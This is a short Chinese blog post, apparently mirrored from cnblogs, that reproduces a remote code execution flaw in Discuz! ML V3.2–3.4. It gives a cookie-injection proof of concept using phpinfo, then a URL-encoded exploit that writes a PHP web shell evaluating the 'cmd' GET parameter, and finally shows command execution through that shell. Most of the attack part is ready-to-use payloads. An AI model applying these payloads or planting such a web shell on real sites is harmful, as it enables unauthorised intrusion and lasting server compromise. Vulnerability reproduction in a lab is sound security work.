zoukankan      html  css  js  c++  java
  • Discuz! ML RCE漏洞 getshell 复现

    0x01 影响版本

    Discuz! ML V3.2

    Discuz! ML V3.3

    Discuz! ML V3.4

    0x02 环境搭建

    直接官网下载即可http://discuz.ml/download

    将压缩包解压至phpstudy网站根目录,浏览器访问upload目录即可开始安装

    之后就是傻瓜式操作,一直点击下一步就可以了,直到完成安装

    0x03 漏洞Poc

    随便点击一个,抓包

    将Cookie中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码

    0x04 Getshell

    EXP:

    %27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

    本地就多了一个shell.php文件

    访问http://127.0.0.1/discuzml/upload/shell.php?cmd=system('whoami');即可看到成功执行了命令

    参考文章:

     https://mp.weixin.qq.com/s/B5K9gr7Hhu7PlHk_H5WK2g

  • 相关阅读:
    Python
    Python
    Python
    Django REST framework
    Django REST framework
    Django REST framework
    Django REST framework
    jquery.unobtrusive-ajax.js的扩展,做到片段式加载
    jquery.unobtrusive-ajax.js单独的用法
    不复杂的Autofac注入
  • 原文地址:https://www.cnblogs.com/paperpen/p/11192154.html
Copyright © 2011-2022 走看看